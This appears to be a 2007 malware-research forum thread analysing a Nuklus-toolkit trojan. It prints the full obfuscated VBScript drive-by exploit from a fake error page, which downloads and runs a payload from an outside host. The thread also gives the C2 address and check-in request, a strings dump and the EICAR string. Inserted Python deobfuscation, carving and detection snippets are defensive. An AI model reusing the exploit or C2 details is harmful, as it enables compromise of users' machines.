Searching for: Trojan Crimeware using Google Maps


hi,

anyone caught the phishing trojan mentioned here?

http://www.websense.com/securitylabs/alerts/alert.php?AlertID=741

upload would be great!

cheers,
frank

I haven't started looking for much detail yet, but so far I have found the following info, which may or may not be anything you already know. The following link is a Symantec security response page:

http://www.symantec.com/enterprise/security_response/weblog/2007/02/nuklus_toolkit_in_action.html

There is a (maybe) related case; it gives the following info:
**quote**
The "iexplorer.exe" file downloads and installs five additional files from a server in Russia. The filenames are:

IEMod.dll
IEGrabber.dll
IEFaker.dll
CertGrabber.dll
PSGrabber.dll
**end quote**

The article can be found here:

http://www.symantec.com/enterprise/security_response/weblog/2007/02/nuklus_toolkit_in_action.html

But as it states in the article, "Both sets of URL's used MS06-014, both used the same lure, but they were different payloads that eventually were downloaded and installed.", although they both appear to use the Nuklus Toolkit.

I hope this is of some help to you.
Cheers, Lucent

here's some additional info.

surfing to http://bestfunny.hk/ gives me:

502 Service Temporarily Overloaded

Server congestion; too many connections; high traffic.

Keep trying until the page loads. This can be a common occurrence at peak news times.

Also try to shutdown your firewall and antivirus software.

and the HTML code:

502 Service Temporarily Overloaded

Dim Obj_Name
Dim Obj_Prog

set obj_RDS = document.createElement("object")
obj_RDS.setAttribute "id", "obj_RDS"
obj_RDS.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

fn = "39177249250.exe"
Obj_Name = "S" & "h" & "e" & "l" & "l"
Obj_Prog = "A" & "p" & "pl" & "i" & "ca" & "ti" & "on"
set obj_ShellApp = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
Set oFolder = obj_ShellApp.NameSpace(20)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
fn=WinDir & fn

Obj_Name = "Mi" & "cr" & "osoft"
Obj_Prog = "X" & "M" & "LHTT" & "P"
set obj_msxml2 = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
obj_msxml2.open "G" & "E" & "T","http://www.infohelp.hk/iexplore.exe",False
obj_msxml2.send

Obj_Name = "AD" & "ODB"
Obj_Prog = "St" & "rea" & "m"
set obj_adodb = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
rem Obj_Name = "W" & "Sc" & "r" & "ipt"
rem Obj_Prog = "Sh" & "e" & "l" & "l"
rem set obj_WShell=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
obj_adodb.Type=1
obj_adodb.Open
obj_adodb.Write(obj_msxml2.responseBody)
obj_adodb.SaveToFile fn,2
rem obj_WShell.Run fn,1,FALSE
obj_ShellApp.ShellExecute fn

502 Service Temporarily Overloaded

Server congestion; too many connections; high traffic.

Keep trying until the page loads. This can be a common occurrence at peak news times.

Also try to shutdown your firewall and antivirus software.

unfortunately the URL http://www.infohelp.hk/iexplore.exe is down. anyone caught iexplore.exe?
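A small deobfuscator for the string-splitting trick used in that page, added here as an example and not code from the original post or from the kit: it joins the "S" & "h" & "e" & "l" & "l" literals, resolves the ProgIDs passed to CreateObject through the Obj_Name/Obj_Prog variables, and flags the RDS.DataSpace CLSID; the embedded sample is a constructed fragment in the same style with a placeholder URL.

```python
import re

# CLSID of the RDS.DataSpace control abused by MS06-014 (taken from the page).
RDS_DATASPACE_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"

# Two or more double-quoted literals joined with '&', e.g. "S" & "h" & "ell".
_CONCAT_RE = re.compile(r'"[^"]*"(?:\s*&\s*"[^"]*")+')


def collapse_concats(script):
    """Join each run of quoted literals concatenated with & into one literal."""
    return _CONCAT_RE.sub(
        lambda m: '"' + "".join(re.findall(r'"([^"]*)"', m.group(0))) + '"', script)


def extract_indicators(script):
    """Resolve CreateObject ProgIDs built from variables, plus URLs and the RDS CLSID."""
    env = {}          # last string literal assigned to each variable (case-insensitive)
    progids = []
    deob = collapse_concats(script)
    for line in deob.splitlines():
        line = line.strip()
        if line.lower().startswith("rem "):     # commented-out VBScript, skip it
            continue
        m = re.match(r'(\w+)\s*=\s*"([^"]*)"$', line)
        if m:
            env[m.group(1).lower()] = m.group(2)
            continue
        m = re.search(r'CreateObject\((.+?),\s*""\)', line, re.IGNORECASE)
        if m:
            # Substitute known variables into the argument, then collapse again.
            expr = re.sub(r'\b(\w+)\b', lambda v: '"%s"' % env[v.group(1).lower()]
                          if v.group(1).lower() in env else v.group(0), m.group(1))
            progids.append(collapse_concats(expr).strip('"'))
    return {"rds_dataspace": RDS_DATASPACE_CLSID.lower() in deob.lower(),
            "progids": progids,
            "urls": sorted(set(re.findall(r'https?://[^\s",]+', deob)))}


# Constructed sample in the style of the page's script (the URL is a placeholder).
SAMPLE_SCRIPT = '''
set obj_RDS = document.createElement("object")
obj_RDS.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Obj_Name = "S" & "h" & "e" & "l" & "l"
Obj_Prog = "A" & "p" & "pl" & "i" & "ca" & "ti" & "on"
set obj_ShellApp = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
Obj_Name = "Mi" & "cr" & "osoft"
Obj_Prog = "X" & "M" & "LHTT" & "P"
set obj_msxml2 = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
obj_msxml2.open "G" & "E" & "T","http://dropper.example.invalid/payload.exe",False
'''
```

Run extract_indicators(SAMPLE_SCRIPT) to get the resolved ProgIDs, the download URL and the CLSID hit in one dictionary.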

I grabbed a sample before it went down...

53ce5510df571edafda6048d1d921a71 www.infohelp.hk/iexplore.exe

It's in the Malware archive here now; Search for that MD5.

I have the HTML/JavaScript pages that went with it too, if needed.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

thanx for iexplore.exe.

i had some time this morning to look at it.

the binary was packed with WinUpack v0.39.

quite easy to unpack (esp trick).

the unpacked code then deobfuscates another binary with XOR 0x99 and drops it in the temp dir and starts it.

3fb.tmp.exe i 58.65.237.49 80 /~botnet2/apophis/script.php

the detached file is packed with WinUpack v0.39 as well.

the unpacked binary copies itself to %systemroot%\system32\ as taskmang.exe and creates another file called mt_32.dll (not a real dll, just text). the temp file then gets deleted. taskmang.exe gets registered as a service and tries to download the real trojan code from the ip mentioned above.

it seems that script.php validates the HTTP request to ensure that only the dropper is able to leech the trojan code. here's the request:

POST /~botnet2/apophis/script.php?00000000 HTTP/1.1
Host: 58.65.237.49
Content-Type: multipart/form-data; boundary=--__abcd-xyz789__--
Content-Length: 185
Connection: Close

----__abcd-xyz789__--
Content-Disposition: form-data; name="conf"

Kernel:0;
----__abcd-xyz789__--
Content-Disposition: form-data; name="LastCommand"

----__abcd-xyz789__----

unfortunately, the code is no longer hosted on this box, so no further investigation was possible for me. :(

HTTP/1.1 404 Not Found
Date: Fri, 02 Mar 2007 14:57:30 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a PHP/4.4.5 mod_perl/1.29 FrontPage/5.0.2.2510
Last-Modified: Sat, 27 Aug 2005 18:19:33 GMT
ETag: "918064-11c-4310aeb5"
Accept-Ranges: bytes
Content-Length: 284
Connection: close
Content-Type: text/html

404 Not Found

Not Found
The requested URL was not found on this server.

Apache Server at Port

anyone caught the following files?

FFGrabber
PSGrabber
CertGrabber
IEFaker
IEGrabber
IEMod

additionally here are the strings from the unpacked dropper:

kernel32.dll
LoadLibraryA
GetProcAddress
UpackByDwing@
.Upack
.rsrc
.mackt
VideoBiosDate
SystemBiosDate
HARDWARE\DESCRIPTION\System
Run
\cmd.exe
Kernel
FFGrabber
PSGrabber
CertGrabber
IEFaker
IEGrabber
IEMod
Delete
GetModInfo
Install
\shell\open\command
SOFTWARE\Clients\StartMenuInternet
POST %s?%08x HTTP/1.1
Host: %s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Connection: Close
%s%s
Content-Disposition: form-data; name="LastCommand"
--%s--
%s:%d:%d
--%s
Content-Disposition: form-data; name="conf"
%s:%d;
--__abcd-xyz789__--
ws2_32.dll
advapi32.dll
user23.dll
Type
Start
ErrorControl
ImagePath
ObjectName
LocalSystem
DisplayName
Windows Task Manager
SYSTEM\CurrentControlSet\Services\Taskmng
getaddrinfo
Connection: Close
HTTP/1.1
Host:
aaa /
.exe
Taskmng
SYSTEM\CurrentControlSet\Services
.dll
Stop
Activate
Execute
--%s--
Content-Type:
; filename="
--%s
Content-Disposition: form-data; name="%s"
POST %s HTTP/1.1
Host: %s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Connection: Close
%s?%08x
MTBase
\mt_32.dll
\taskmang.exe
WS2_32.DLL
NTDLL.DLL
NtUnmapViewOfSection
memcpy
ZwMapViewOfSection
NtCreateSection
memset
strlen
_chkstk
strtol
NtClose
SHLWAPI.DLL
SHDeleteKeyA
KERNEL32.DLL
SetEndOfFile
GetTempPathA
GetTempFileNameA
LoadLibraryExA
GetModuleFileNameA
GetCommandLineA
GetFileSize
VirtualFree
VirtualProtect
DuplicateHandle
GetModuleHandleA
ReadProcessMemory
VirtualAlloc
WaitForSingleObject
CloseHandle
lstrcmpiA
ReadFile
SetFilePointer
CreateFileA
WriteFile
GetEnvironmentVariableA
FreeLibrary
GetProcAddress
LoadLibraryA
SetErrorMode
lstrcatA
GetSystemDirectoryA
TerminateProcess
CreateRemoteThread
ExitProcess
GetLastError
DeleteFileA
Sleep
lstrlenA
CreateProcessA
lstrcpyA
CopyFileA
USER32.DLL
PeekMessageA
wsprintfA
DispatchMessageA
ADVAPI32.DLL
RegDeleteKeyA
RegCreateKeyExA
RegSetValueExA
RegOpenKeyExA
RegQueryValueExA
RegCloseKey
advapi32.dll
RegDeleteKeyA
RegCreateKeyExA
RegSetValueExA
RegOpenKeyExA
RegQueryValueExA
RegCloseKey
kernel32.dll
SetEndOfFile
GetTempPathA
GetTempFileNameA
LoadLibraryExA
GetModuleFileNameA
GetCommandLineA
GetFileSize
VirtualFree
VirtualProtect
DuplicateHandle
GetModuleHandleA
ReadProcessMemory
VirtualAlloc
WaitForSingleObject
CloseHandle
lstrcmpi
ReadFile
SetFilePointer
CreateFileA
WriteFile
GetEnvironmentVariableA
FreeLibrary
GetProcAddress
LoadLibraryA
SetErrorMode
lstrcat
GetSystemDirectoryA
TerminateProcess
CreateRemoteThread
ExitProcess
GetLastError
DeleteFileA
Sleep
lstrlen
CreateProcessA
lstrcpy
CopyFileA
shlwapi.dll
SHDeleteKeyA
user32.dll
PeekMessageA
wsprintfA
DispatchMessageA
ws2_32.dll
recv
connect
WSAStartup
socket
gethostbyname
htons
shutdown
send
closesocket
ntdll.dll
NtUnmapViewOfSection
memcpy
NtMapViewOfSection
NtCreateSection
memset
strlen
_alloca_probe
strtol
NtClose
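An added example for the XOR 0x99 layer described in the analysis above (my own tooling, not the poster's): it scans a blob for a DOS header that is still encoded, checks that e_lfanew points at a real "PE\0\0" after decoding, and carves the image. The carrier is a constructed buffer with a minimal fake PE header, since the real sample is not on the page.

```python
XOR_KEY = 0x99      # single-byte key the post reports for the embedded binary
PE_SIG = b"PE\0\0"


def xor_bytes(data, key):
    """XOR every byte with one key byte; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def find_xored_pe(blob, key=XOR_KEY):
    """Yield (offset, decoded_image) for each XOR-encoded PE whose headers check out."""
    marker = xor_bytes(b"MZ", key)          # the DOS signature as it looks while encoded
    pos = blob.find(marker)
    while pos != -1:
        dos = xor_bytes(blob[pos:pos + 0x40], key)
        if len(dos) == 0x40:
            e_lfanew = int.from_bytes(dos[0x3C:0x40], "little")
            pe = xor_bytes(blob[pos + e_lfanew:pos + e_lfanew + 4], key)
            # Require a sane e_lfanew and a real PE signature there to reject chance hits.
            if 0x40 <= e_lfanew < 0x1000 and pe == PE_SIG:
                # Decode to the end of the carrier; the true image size comes from the PE headers.
                yield pos, xor_bytes(blob[pos:], key)
        pos = blob.find(marker, pos + 1)


def carve_first(blob, key=XOR_KEY):
    """Return (offset, decoded_image) for the first hit, or None."""
    return next(find_xored_pe(blob, key), None)


# Constructed carrier: junk, then a minimal fake PE header (e_lfanew = 0x80) XORed with 0x99.
FAKE_PE = (b"MZ" + b"\0" * 58 + (0x80).to_bytes(4, "little") + b"\0" * 0x40
           + PE_SIG + b"\x4c\x01" + b"\0" * 18)
CARRIER = b"\x90" * 0x30 + xor_bytes(FAKE_PE, XOR_KEY) + b"\0" * 8

if __name__ == "__main__":
    offset, image = carve_first(CARRIER)
    print(hex(offset), image[:2], image[0x80:0x84])
```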
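Detection logic for the check-in shape shown in the captured request above, added as an example that is not from the original post: it parses the multipart POST and matches the fixed boundary, the 8-hex-digit query and the conf/LastCommand fields that the dropper's format strings (POST %s?%08x, %s:%d;, name="LastCommand") produce. The sample is the captured request re-typed with CRLF line endings.

```python
import re

# Fixed multipart boundary hard-coded in the dropper (see the strings dump above).
NUKLUS_BOUNDARY = "--__abcd-xyz789__--"


def parse_multipart(body, boundary):
    """Return {field name: value} for the form-data parts delimited by boundary."""
    parts = {}
    for chunk in body.split("--" + boundary):
        chunk = chunk.strip()
        if not chunk or chunk == "--":          # empty lead-in / closing '--' marker
            continue
        head, _, value = chunk.partition("\n\n")
        m = re.search(r'name="([^"]+)"', head)
        if m:
            parts[m.group(1)] = value.strip()
    return parts


def parse_checkin(raw):
    """Break a raw HTTP request into the pieces the check-in signature needs."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    m = re.match(r'POST (\S+?)\?([0-9a-f]{8}) HTTP/1\.[01]$', head.split("\n")[0], re.I)
    bm = re.search(r'^Content-Type:\s*multipart/form-data;\s*boundary=(\S+)$', head, re.M | re.I)
    boundary = bm.group(1) if bm else None
    return {"path": m.group(1) if m else None, "hex_query": m.group(2) if m else None,
            "boundary": boundary,
            "fields": parse_multipart(body, boundary) if boundary else {}}


def is_nuklus_checkin(raw):
    """True when the request has the dropper's hard-coded check-in shape."""
    info = parse_checkin(raw)
    conf = info["fields"].get("conf", "")
    return (info["hex_query"] is not None
            and info["boundary"] == NUKLUS_BOUNDARY
            and re.fullmatch(r'(\w+:\d+;)+', conf) is not None   # e.g. "Kernel:0;"
            and "LastCommand" in info["fields"])


# The check-in captured in the post above, re-typed here as the sample input.
SAMPLE_REQUEST = "\r\n".join([
    "POST /~botnet2/apophis/script.php?00000000 HTTP/1.1",
    "Host: 58.65.237.49",
    "Content-Type: multipart/form-data; boundary=--__abcd-xyz789__--",
    "Content-Length: 185", "Connection: Close", "",
    "----__abcd-xyz789__--", 'Content-Disposition: form-data; name="conf"', "",
    "Kernel:0;",
    "----__abcd-xyz789__--", 'Content-Disposition: form-data; name="LastCommand"', "",
    "----__abcd-xyz789__----", ""])
```

is_nuklus_checkin(SAMPLE_REQUEST) returns True; a request with any other boundary, a non-hex query or a conf field that is not a list of Name:number; pairs is rejected.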